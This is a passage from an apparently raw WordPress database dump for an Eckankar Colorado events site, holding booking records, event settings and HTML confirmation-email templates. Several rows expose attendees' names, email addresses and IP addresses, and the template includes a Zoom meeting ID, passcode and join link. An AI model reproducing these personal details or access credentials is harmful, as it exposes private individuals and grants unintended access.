'),(170959,267316,'_field_224','Paul'),(170960,267316,'_field_225','Belcher'),(170961,267316,'_field_226','templegraeae@gmx.us'),(170962,267316,'_field_227','NC'),(170963,267316,'_field_228','US'),(170964,267316,'_field_229','a:2:{i:0;s:16:\"Colorado Springs\";i:1;s:39:\"Central Colorado/ECK Temple in Colorado\";}'),(170965,267316,'_form_id','21'),(170966,267316,'_seq_num','157'),(191563,269020,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:185355;s:12:\"smushed-size\";i:178357;s:15:\"savings-percent\";d:3.779999999999999804600747665972448885440826416015625;s:10:\"sizes-info\";a:10:{s:4:\"full\";a:2:{s:8:\"original\";i:185355;s:10:\"compressed\";i:178357;}s:6:\"medium\";a:2:{s:8:\"original\";i:15492;s:10:\"compressed\";i:15292;}s:5:\"large\";a:2:{s:8:\"original\";i:103305;s:10:\"compressed\";i:101521;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:7550;s:10:\"compressed\";i:7484;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:62255;s:10:\"compressed\";i:61134;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:25393;s:10:\"compressed\";i:25200;}s:12:\"thumbrelated\";a:2:{s:8:\"original\";i:63657;s:10:\"compressed\";i:62626;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:45143;s:10:\"compressed\";i:44470;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:31472;s:10:\"compressed\";i:30984;}s:8:\"tileview\";a:2:{s:8:\"original\";i:29639;s:10:\"compressed\";i:29476;}}}'),(191562,269020,'smush-info','The file was compressed from 181.01 KB to 174.18 KB, saving 3.78 percent, using WP-Optimize'),(191561,269020,'smush-complete','1'),(191560,269020,'original-file','2023/09/web-promo-bk-4-updraft-pre-smush-original.jpg'),(170991,267320,'mec_transaction_id','RCO64499'),(170992,267320,'mec_user_id','1000044'),(170993,267320,'mec_verified','1'),(170994,267320,'mec_verification_key','5f98d7e47364e5394e7d11bce26601c9'),(170995,267320,'mec_cancellation_key','ac5185d2ca6db7a228018e7a0de0961d'),(170996,267320,'mec_confirmed','1'),(170997,267320,'mec_event_id','266604'),(170998,267320,'mec_date','1665920700:1665925200'),(170999,267320,'mec_ticket_id',',1,'),(171000,267320,'mec_booking_time','2022-10-13 07:50:14'),(171001,267320,'mec_all_dates','a:0:{}'),(171002,267320,'mec_other_dates','a:0:{}'),(171003,267320,'mec_attention_time','1665920700:1665925200'),(171004,267320,'mec_attention_time_start','1665920700'),(171005,267320,'mec_attention_time_end','1665925200'),(171006,267320,'mec_book_date_submit','20221013075014'),(171007,267320,'mec_booking_location','118'),(171008,267320,'mec_ticket_price_1','0'),(171009,267320,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:26:\"colleynadanler@hotmail.com\";s:4:\"name\";s:15:\"Colleyna Danler\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:13:\"208.93.179.71\";}}'),(171010,267320,'mec_price','0'),(171011,267320,'mec_gateway','MEC_gateway_free'),(171012,267320,'mec_gateway_label','Free'),(171013,267321,'mec_transaction_id','CBT92815'),(171014,267321,'mec_user_id','1000044'),(171015,267321,'mec_verified','1'),(171016,267321,'mec_verification_key','aba2adca1af5186a95dc8a896eac01dc'),(171017,267321,'mec_cancellation_key','45f3f58ae5accb0b19cdd79bfb32e4d0'),(171018,267321,'mec_confirmed','1'),(171019,267321,'mec_event_id','266604'),(171020,267321,'mec_date','1665920700:1665925200'),(171021,267321,'mec_ticket_id',',1,'),(171022,267321,'mec_booking_time','2022-10-13 07:54:39'),(171023,267321,'mec_all_dates','a:0:{}'),(171024,267321,'mec_other_dates','a:0:{}'),(171025,267321,'mec_attention_time','1665920700:1665925200'),(171026,267321,'mec_attention_time_start','1665920700'),(171027,267321,'mec_attention_time_end','1665925200'),(171028,267321,'mec_book_date_submit','20221013075439'),(171029,267321,'mec_booking_location','118'),(171030,267321,'mec_ticket_price_1','0'),(171031,267321,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:26:\"colleynadanler@hotmail.com\";s:4:\"name\";s:15:\"Colleyna Danler\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:13:\"208.93.179.71\";}}'),(171032,267321,'mec_price','0'),(171033,267321,'mec_gateway','MEC_gateway_free'),(171034,267321,'mec_gateway_label','Free'),(191559,269020,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1267;s:6:\"height\";i:446;s:4:\"file\";s:26:\"2023/09/web-promo-bk-4.jpg\";s:8:\"filesize\";i:185355;s:5:\"sizes\";a:9:{s:6:\"medium\";a:5:{s:4:\"file\";s:26:\"web-promo-bk-4-350x123.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:123;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15492;}s:5:\"large\";a:5:{s:4:\"file\";s:27:\"web-promo-bk-4-1024x360.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:360;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:103305;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:26:\"web-promo-bk-4-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7550;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:26:\"web-promo-bk-4-768x270.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:270;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:62255;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:26:\"web-promo-bk-4-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25393;}s:12:\"thumbrelated\";a:5:{s:4:\"file\";s:26:\"web-promo-bk-4-500x446.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:446;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:63657;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:26:\"web-promo-bk-4-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:45143;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:26:\"web-promo-bk-4-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:31472;}s:8:\"tileview\";a:5:{s:4:\"file\";s:26:\"web-promo-bk-4-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:29639;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(191558,269020,'_wp_attached_file','2023/09/web-promo-bk-4.jpg'),(191557,269018,'_edit_last','2'),(191556,269018,'_edit_lock','1694351931:2'),(191554,269018,'mec_banner','a:0:{}'),(191553,269018,'mec_related_events','a:0:{}'),(191551,269018,'mec_sequence','10'),(191552,269018,'mec_event_gallery','a:0:{}'),(191550,269018,'mec_end_datetime','2023-09-24 11:30 AM'),(171083,267329,'mec_transaction_id','GZD40069'),(171084,267329,'mec_user_id','1000050'),(171085,267329,'mec_verified','1'),(171086,267329,'mec_verification_key','8cc5df4f2de2f5765d615896c77df193'),(171087,267329,'mec_cancellation_key','0b98ef2c018ce72483b645b9e836ff56'),(171088,267329,'mec_confirmed','1'),(171089,267329,'mec_event_id','266604'),(171090,267329,'mec_date','1665920700:1665925200'),(171091,267329,'mec_ticket_id',',1,'),(171092,267329,'mec_booking_time','2022-10-15 12:28:44'),(171093,267329,'mec_all_dates','a:0:{}'),(171094,267329,'mec_other_dates','a:0:{}'),(171095,267329,'mec_attention_time','1665920700:1665925200'),(171096,267329,'mec_attention_time_start','1665920700'),(171097,267329,'mec_attention_time_end','1665925200'),(171098,267329,'mec_book_date_submit','20221015122844'),(171099,267329,'mec_booking_location','118'),(171100,267329,'mec_ticket_price_1','0'),(171101,267329,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:21:\"sandykarlic@gmail.com\";s:4:\"name\";s:25:\"Sandy(Tarzana California)\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:13:\"172.89.183.33\";}}'),(171102,267329,'mec_price','0'),(171103,267329,'mec_gateway','MEC_gateway_free'),(171104,267329,'mec_gateway_label','Free'),(171105,267330,'mec_transaction_id','ENJ93195'),(171106,267330,'mec_user_id','1000014'),(171107,267330,'mec_verified','1'),(171108,267330,'mec_verification_key','681aa376f2ce756c7706d0b7236e98a9'),(171109,267330,'mec_cancellation_key','61e0d999798b336fddbaaf8df245becf'),(171110,267330,'mec_confirmed','1'),(171111,267330,'mec_event_id','266604'),(171112,267330,'mec_date','1665920700:1665925200'),(171113,267330,'mec_ticket_id',',1,'),(171114,267330,'mec_booking_time','2022-10-16 07:09:35'),(171115,267330,'mec_all_dates','a:0:{}'),(171116,267330,'mec_other_dates','a:0:{}'),(171117,267330,'mec_attention_time','1665920700:1665925200'),(171118,267330,'mec_attention_time_start','1665920700'),(171119,267330,'mec_attention_time_end','1665925200'),(171120,267330,'mec_book_date_submit','20221016070935'),(171121,267330,'mec_booking_location','118'),(171122,267330,'mec_ticket_price_1','0'),(171123,267330,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:19:\"keanchico@yahoo.com\";s:4:\"name\";s:5:\"Kery \";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:14:\"97.121.128.144\";}}'),(171124,267330,'mec_price','0'),(171125,267330,'mec_gateway','MEC_gateway_free'),(171126,267330,'mec_gateway_label','Free'),(171127,267331,'mec_transaction_id','TOD81749'),(171128,267331,'mec_user_id','1000014'),(171129,267331,'mec_verified','1'),(171130,267331,'mec_verification_key','7b98cc47ea51c963ac3054b03cbe458b'),(171131,267331,'mec_cancellation_key','5e43137b94232e3e12f1003916906590'),(171132,267331,'mec_confirmed','1'),(171133,267331,'mec_event_id','266604'),(171134,267331,'mec_date','1665920700:1665925200'),(171135,267331,'mec_ticket_id',',1,'),(171136,267331,'mec_booking_time','2022-10-16 08:34:14'),(171137,267331,'mec_all_dates','a:0:{}'),(171138,267331,'mec_other_dates','a:0:{}'),(171139,267331,'mec_attention_time','1665920700:1665925200'),(171140,267331,'mec_attention_time_start','1665920700'),(171141,267331,'mec_attention_time_end','1665925200'),(171142,267331,'mec_book_date_submit','20221016083414'),(171143,267331,'mec_booking_location','118'),(171144,267331,'mec_ticket_price_1','0'),(171145,267331,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:19:\"keanchico@yahoo.com\";s:4:\"name\";s:12:\"Kery Colvin \";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:14:\"97.121.128.144\";}}'),(171146,267331,'mec_price','0'),(171147,267331,'mec_gateway','MEC_gateway_free'),(171148,267331,'mec_gateway_label','Free'),(191549,269018,'mec_start_datetime','2023-09-24 10:30 AM'),(191548,269018,'mec_trailer_title',''),(191547,269018,'mec_trailer_url',''),(191545,269018,'mec_cost_auto_calculate','0'),(191546,269018,'mec_style_per_event','global'),(191544,269018,'passster_area_shortcode',''),(191543,269018,'boldgrid_in_page_containers','1'),(191555,269018,'_dp_original','266311'),(191541,269018,'_thumbnail_id','268755'),(191540,269018,'boldgrid_hide_page_title','0'),(191539,269018,'passster_protection_type','password'),(191538,269018,'passster_activate_protection',NULL),(191537,269018,'passster_activate_global_protection',NULL),(171165,267334,'mec_color',''),(171166,267334,'mec_location_id','118'),(171167,267334,'mec_dont_show_map','0'),(171168,267334,'mec_organizer_id','1'),(171169,267334,'mec_read_more',''),(171170,267334,'mec_more_info',''),(171171,267334,'mec_more_info_title',''),(171172,267334,'mec_more_info_target','_self'),(171173,267334,'mec_cost',''),(171174,267334,'mec_currency','a:0:{}'),(171175,267334,'mec_additional_organizer_ids','a:0:{}'),(171176,267334,'mec_additional_location_ids','a:0:{}'),(171177,267334,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-11-06\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-11-06\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(171178,267334,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(171179,267334,'mec_certain_weekdays','a:0:{}'),(171180,267334,'mec_allday','0'),(171181,267334,'one_occurrence','0'),(171182,267334,'mec_hide_time','0'),(171183,267334,'mec_hide_end_time','0'),(171184,267334,'mec_comment',''),(171185,267334,'mec_timezone','global'),(171186,267334,'mec_countdown_method','global'),(171187,267334,'mec_public','1'),(171188,267334,'mec_start_date','2022-11-06'),(171189,267334,'mec_start_time_hour','10'),(171190,267334,'mec_start_time_minutes','30'),(171191,267334,'mec_start_time_ampm','AM'),(171192,267334,'mec_start_day_seconds','37800'),(171193,267334,'mec_end_date','2022-11-06'),(171194,267334,'mec_end_time_hour','11'),(171195,267334,'mec_end_time_minutes','30'),(171196,267334,'mec_end_time_ampm','PM'),(171197,267334,'mec_end_day_seconds','84600'),(171198,267334,'mec_repeat_status','0'),(171199,267334,'mec_repeat_type',''),(171200,267334,'mec_repeat_interval','1'),(171201,267334,'mec_repeat_end',''),(171202,267334,'mec_repeat_end_at_occurrences',''),(171203,267334,'mec_repeat_end_at_date',''),(171204,267334,'mec_advanced_days','a:0:{}'),(171205,267334,'mec_in_days',''),(171206,267334,'mec_not_in_days',''),(171207,267334,'mec_hourly_schedules','a:0:{}'),(171208,267334,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"1\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:1:\"1\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(171209,267334,'mec_tickets','a:1:{i:1;a:17:{s:4:\"name\";s:32:\"Experience HU, The Sound of Soul\";s:22:\"ticket_start_time_hour\";s:2:\"10\";s:24:\"ticket_start_time_minute\";s:2:\"30\";s:22:\"ticket_start_time_ampm\";s:2:\"AM\";s:20:\"ticket_end_time_hour\";s:2:\"11\";s:22:\"ticket_end_time_minute\";s:2:\"30\";s:20:\"ticket_end_time_ampm\";s:2:\"PM\";s:11:\"description\";s:13:\"Register Here\";s:19:\"private_description\";s:0:\"\";s:5:\"price\";s:1:\"0\";s:11:\"price_label\";s:0:\"\";s:5:\"limit\";s:0:\"\";s:9:\"unlimited\";s:1:\"1\";s:14:\"minimum_ticket\";s:1:\"1\";s:18:\"stop_selling_value\";s:1:\"0\";s:17:\"stop_selling_type\";s:4:\"hour\";s:5:\"dates\";a:0:{}}}'),(171210,267334,'mec_fees_global_inheritance','1'),(171211,267334,'mec_fees','a:0:{}'),(171212,267334,'mec_ticket_variations_global_inheritance','1'),(171213,267334,'mec_ticket_variations','a:0:{}'),(171214,267334,'mec_reg_fields_global_inheritance','1'),(171215,267334,'mec_reg_fields','a:0:{}'),(171216,267334,'mec_bfixed_fields','a:0:{}'),(171217,267334,'mec_op','a:0:{}'),(171218,267334,'mec_fields','a:0:{}'),(171219,267334,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:27:\"Eckankar Event Registration\";s:7:\"content\";s:6143:\"<div>\r\n<style>\r\n    table, td, div, h1, p \r\n      font-family: Arial, sans-serif;\r\n    }\r\n    @media screen and (max-width: 530px) {<br />\r\n      .unsub {<br />\r\n        display: block;<br />\r\n        padding: 8px;<br />\r\n        margin-top: 14px;<br />\r\n        border-radius: 6px;<br />\r\n        background-color: #555555;<br />\r\n        text-decoration: none !important;<br />\r\n        font-weight: bold;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 100% !important;<br />\r\n      }<br />\r\n    }<br />\r\n    @media screen and (min-width: 531px) {<br />\r\n      .col-sml {<br />\r\n        max-width: 27% !important;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 73% !important;<br />\r\n      }<br />\r\n    }<br />\r\n  </style>\r\n</div>\r\n<div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust: 100%; -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; background-color: #ffffff;\" lang=\"en\">\r\n<table style=\"width: 100%; border: none; border-spacing: 0;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0;\" align=\"center\"><!-- [if mso]></p>\r\n<table role=\"presentation\" align=\"center\" style=\"width:600px;\">\r\n<tr>\r\n<td>\r\n<p>          <![endif]-->\r\n<table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 0px 10px 0px; background-color: #ffffff; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\"><img class=\"alignnone size-full wp-image-266555\" src=\"https://eckankar-colorado.org/wp-content/uploads/2022/04/email-img-registration-600-5.jpg\" alt=\"\" width=\"602\" height=\"302\" /></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px 20px 10px 20px; background-color: #f5f5f5; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\">\r\n<p style=\"margin: 0;\"><span style=\"color: #f28a27; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>Event Registration Confirmation</strong></span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px 10px 10px 10px; font-size: 0; background-color: #ffffff; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35);\"><!-- [if mso]></p>\r\n<table role=\"presentation\" width=\"100%\">\r\n<tr>\r\n<td style=\"width:145px; padding: 15px 10px 11px 10px;\" align=\"left\" valign=\"top\">\r\n<p>                <![endif]-->\r\n<div class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\">\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px;\"><b>Hello %%first_name%% and thank you for registering!</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 20px;\">You are signed up for the following online event:</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b><span style=\"color: #f28a27;\">Title: </span>%%event_title%%</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b style=\"color: #f28a27;\">Date: </b>%%event_start_date%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b style=\"color: #f28a27;\">Time: </b>%%event_start_time%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 15px;\"> </p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px; color: #f28a27;\"><b>Zoom Login Information:</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\"><b>Meeting ID: </b>891 2510 3432<br />\r\n<b>Passcode:</b> 162109</p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><a href=\"https://us02web.zoom.us/j/89125103432?pwd=QVRETUo3bENGM0lKZzhDN2pjVGZnQT09\">https://us02web.zoom.us/j/89125103432?pwd=QVRETUo3bENGM0lKZzhDN2pjVGZnQT09</a></p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><b>Dial-in number: </b>720-707-2699 (for those who need to join by phone)</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">After you click the link, you will be prompted to either download the app to enter the meeting or enter through your browser. Please note that Zoom works best if you download the app. It is more stable and has more functions. Select use computer audio for sound.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">Please join the meeting 5 - 10 minutes ahead of time to help us start on time. We look forward to seeing you at this online event.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">See you there!</p>\r\n</div>\r\n<p><!-- [if mso]>\r\n                </td>\r\n</tr>\r\n</table>\r\n<p>                <![endif]--></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px; font-size: 16px; line-height: 28px; background-color: #efefef; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35); text-align: center;\">You are receiving this email because you have submitted a request through the <a href=\"https://eckankar-colorado.org/\">Eckankar in Colorado</a> website. If you have any questions regarding the origin of this email, please feel free to get in touch, we\'re always happy to help out.</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px; background-color: #6e6e6e;\">\r\n<figure style=\"text-align: center;\"><span style=\"font-family: arial, helvetica, sans-serif;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </span></figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px; font-family: arial, helvetica, sans-serif;\">© Eckankar In Colorado -2022</span><br />\r\n<span style=\"font-family: arial, helvetica, sans-serif;\"><a title=\"Contact Us\" href=\"mailto:webmaster@eckankar-colorado.org\"><span style=\"font-size: 14px; line-height: 20px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto; color: #cccccc; margin: 0px;\">Contact Us</span></a></span></figure>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p><!-- [if mso]>\r\n          </td>\r\n</tr>\r\n</table>\r\n<p>          <![endif]--></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:22:\"New Event Registration\";s:7:\"content\";s:9924:\"<!-- [if !mso]><!--><!--<![endif]--><!-- [if (gte mso 9)|(IE)]>\r\n\r\n      <xml>\r\n        <o:OfficeDocumentSettings>\r\n          <o:AllowPNG/>\r\n          <o:PixelsPerInch>96</o:PixelsPerInch>\r\n        </o:OfficeDocumentSettings>\r\n      </xml>\r\n      <![endif]--><!-- [if (gte mso 9)|(IE)]>\r\n  \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n<style type=\"text/css\">\r\n    body {width: 600px;margin: 0 auto;}\r\n    table {border-collapse: collapse;}\r\n    table, td {mso-table-lspace: 0pt;mso-table-rspace: 0pt;}\r\n    img {-ms-interpolation-mode: bicubic;}\r\n  </style>\r\n<![endif]-->\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<p>\r\n<style type=\"text/css\">\r\n    body, p, div {\r\n      font-family: inherit;\r\n      font-size: 14px;\r\n    }\r\n    body {\r\n      color: #000000;\r\n    }\r\n    body a {\r\n      color: #1188E6;\r\n      text-decoration: none;\r\n    }\r\n    p { margin: 0; padding: 0; }\r\n    table.wrapper {\r\n      width:100% !important;\r\n      table-layout: fixed;\r\n      -webkit-font-smoothing: antialiased;\r\n      -webkit-text-size-adjust: 100%;\r\n      -moz-text-size-adjust: 100%;\r\n      -ms-text-size-adjust: 100%;\r\n    }\r\n    img.max-width {\r\n      max-width: 100% !important;\r\n    }\r\n    .column.of-2 {\r\n      width: 50%;\r\n    }\r\n    .column.of-3 {\r\n      width: 33.333%;\r\n    }\r\n    .column.of-4 {\r\n      width: 25%;\r\n    }\r\n    ul ul ul ul  {\r\n      list-style-type: disc !important;\r\n    }\r\n    ol ol {\r\n      list-style-type: lower-roman !important;\r\n    }\r\n    ol ol ol {\r\n      list-style-type: lower-latin !important;\r\n    }\r\n    ol ol ol ol {\r\n      list-style-type: decimal !important;\r\n    }\r\n    @media screen and (max-width:480px) {\r\n      .preheader .rightColumnContent,\r\n      .footer .rightColumnContent {\r\n        text-align: left !important;\r\n      }\r\n      .preheader .rightColumnContent div,\r\n      .preheader .rightColumnContent span,\r\n      .footer .rightColumnContent div,\r\n      .footer .rightColumnContent span {\r\n        text-align: left !important;\r\n      }\r\n      .preheader .rightColumnContent,\r\n      .preheader .leftColumnContent {\r\n        font-size: 80% !important;\r\n        padding: 5px 0;\r\n      }\r\n      table.wrapper-mobile {\r\n        width: 100% !important;\r\n        table-layout: fixed;\r\n      }\r\n      img.max-width {\r\n        height: auto !important;\r\n        max-width: 100% !important;\r\n      }\r\n      a.bulletproof-button {\r\n        display: block !important;\r\n        width: auto !important;\r\n        font-size: 80%;\r\n        padding-left: 0 !important;\r\n        padding-right: 0 !important;\r\n      }\r\n      .columns {\r\n        width: 100% !important;\r\n      }\r\n      .column {\r\n        display: block !important;\r\n        width: 100% !important;\r\n        padding-left: 0 !important;\r\n        padding-right: 0 !important;\r\n        margin-left: 0 !important;\r\n        margin-right: 0 !important;\r\n      }\r\n      .social-icon-column {\r\n        display: inline-block !important;\r\n      }\r\n    }\r\n  </style>\r\n</p>\r\n<p>\r\n<style>\r\nbody {font-family: \'Muli\', sans-serif;}\r\n</style>\r\n</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<!--user entered Head Start--><!--End Head user entered--><center class=\"wrapper\" data-link-color=\"#1188E6\" data-body-style=\"font-size:14px; font-family:inherit; color:#000000; background-color:#FFFFFF;\">\r\n<div class=\"webkit\">\r\n<table class=\"wrapper\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" bgcolor=\"#FFFFFF\">\r\n<tbody>\r\n<tr>\r\n<td valign=\"top\" bgcolor=\"#FFFFFF\" width=\"100%\">\r\n<table class=\"outer\" role=\"content-container\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td width=\"100%\">\r\n<table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td><!-- [if mso]>\r\n    <center>\r\n    \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n<table>\r\n<tr>\r\n<td width=\"600\">\r\n  <![endif]-->\r\n<table style=\"width: 100%; max-width: 600px;\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0px 0px 0px 0px; color: #000000; text-align: left;\" role=\"modules-container\" align=\"left\" bgcolor=\"#FFFFFF\" width=\"100%\">\r\n<table class=\"module preheader preheader-hide\" style=\"display: none !important; mso-hide: all; visibility: hidden; opacity: 0; color: transparent; height: 0; width: 0;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"preheader\">\r\n<tbody>\r\n<tr>\r\n<td role=\"module-content\">\r\n<p>&nbsp;</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table style=\"padding: 30px 20px 30px 20px;\" 